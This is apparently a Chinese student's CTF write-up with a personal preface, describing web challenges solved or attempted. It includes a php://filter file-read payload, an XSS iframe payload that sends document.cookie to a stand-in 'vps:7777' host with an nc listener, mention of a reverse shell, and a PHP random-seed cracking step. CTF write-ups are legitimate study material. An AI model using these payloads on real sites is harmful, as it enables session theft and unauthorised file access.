發在正文前
這應該是自己在安全圈摸爬滾打兩年多以來第一次正規的ctf比賽。沒解出flag,沒截圖,只提供了一些思路。
遙想往昔,初入大學,帶着對PT的向往,一個人穿行在幽暗的圖書館,翻閱啃讀一本本安全書籍(后來事實證明,純屬瞎折騰。在此也表達下對那些無師自通的大🐮深深的佩服之情),也從網上收集各種pt資源,棄高數而不學,視線代為無物,弱水三千唯愛我PT,雖晦澀難懂,學習過程舉步維艱,仍然孜孜不倦,越發尋不得,就越發令我向往,言之痴迷不過。
兜兜轉轉,踏上起點,已是大二之事,沒有多少竊喜,相反偶爾徒生黃花菜已涼之感,古人雲:詩酒趁年華,搞事要趁早。但我好像就像一只被歲月風干理想的咸魚(但也是一只不放棄掙扎的咸魚),最黯然莫過於在pt的路上踽踽獨行,偏離了大眾的道路,與眾生相悖而馳,更未曾看見想象中的美妙風景。但,老班長說過,“**就在眼前,夢想呢?也許在更前面一點。”我期待的精彩的世界,也許就在更前面一點,我期待的小伙伴,也許就在更前面一點。自己要用技術做出一番有意義的事情的願景會一直保留,萬一哪一天就實現了?
言歸正傳,承蒙學長辰厚重
,讓我得以完美打了一次醬油,在協會眾人的不懈努力下,最終還是沒進入決賽,拿了個66大吉。
自己給自己頒發一個ctfer的證書,之后的事,當然就是在ctfer圈風生水起,打下一片天地啦。○( ^皿^)っHiahiahia…
正文
babyt3(300)
說真,這題的難度本菜覺得與分值不符,差評。(然后大佬就說了:應該是出了非預期Bug)
打開鏈接,在正中處赫然看見
迫不及待告訴學長,說完之后立馬覺得自己傻Ⅹ。
讀取源碼:/?file=php://filter/read=convert.base64-encode/resource=index.php
繼續:/?file=php://filter/read=convert.base64-encode/resource=dir.php
查看根目錄:/dir.php?dir=/
太明顯了叭:/?file=php://filter/read=convert.base64-encode/resource=/ffffflag_1s_Her4
得到flag
ps:
昨天看見一個大佬的博客,預期解應該是,第一步.DS_Store文件泄露。
breakout(300)
此題可分為拿cookie和利用cookie兩部分。
拿cookie
打開鏈接
message:
想了一下留言板處會出現的漏洞,最常見xss,sql注入
簡單fuzz:<script>....。直接被過濾了,有點此地無銀三百兩,這不是提醒我這就是xss嗎?
於是fuzz一通,過濾了<>里的內容和<>里的on事件,unicode可行,不知道啥用,於是跳到report。
report:
由於不知道第一個框框干嘛的,就先解決第二個框框,md5截斷比較,網上有腳本。
再填寫第一個框框的時候,隨便填寫,提示說不是它的網址,還是不知道干嘛的,跳到exec。
exec:
命令執行,但需要管理權限。
至此知道了message和url是干嘛的了,xss打管理cookie。
回到message,留言:<iframe src="javascript:window.location.href='http://vps:7777/?a='+document.cookie"
回到report,url填寫:http://ctf1.linkedbyx.com:10441/main.php
vps上監聽:nc -lvvp 7777
ok!拿到cookie:balabala
利用cookie
改本地cookie,執行命令,沒有“非管理”的提示了,說明權限認證成功,但沒顯示。在我正在懷疑思路是否正確之際,學長肯定地說,命令執行了,只是沒顯示。
好吧,學習了。
然后問了一下學長:
果然就是,關於反彈shell就不多談了,看這篇文章,至此flag到手。
在網上看見有人用了卡外帶的方法,卡外帶我也想到並試了,大概是姿勢不對,媽蛋,吃了經驗的虧!
猜猜flag是什么(300)
打開鏈接
一開始瘋狂sql注入,后來臨近崩潰才向學長求助。
學長提示
fo了!
網上隨便找個工具打開,打開后
訪問flag,提示沒那容易得到flag,顯然還需要通過別的操作.
至此直到game over也思路全無。
接着膜大佬的wp
用githack獲得一個壓縮包BackupForMySite.zip
用明文攻擊解開壓縮包,得到里面的code
。
之后去主頁面提交:
/?code=你找到的code
給了一個隨機數。
使用php_mt_seed
:
$ time ./php_mt_seed 你的隨機數
得到數字依次訪問:
/flag/得到的數字.txt
得flag
打開鏈接,啥都木有,然后就...沒思路了。,,ԾㅂԾ,,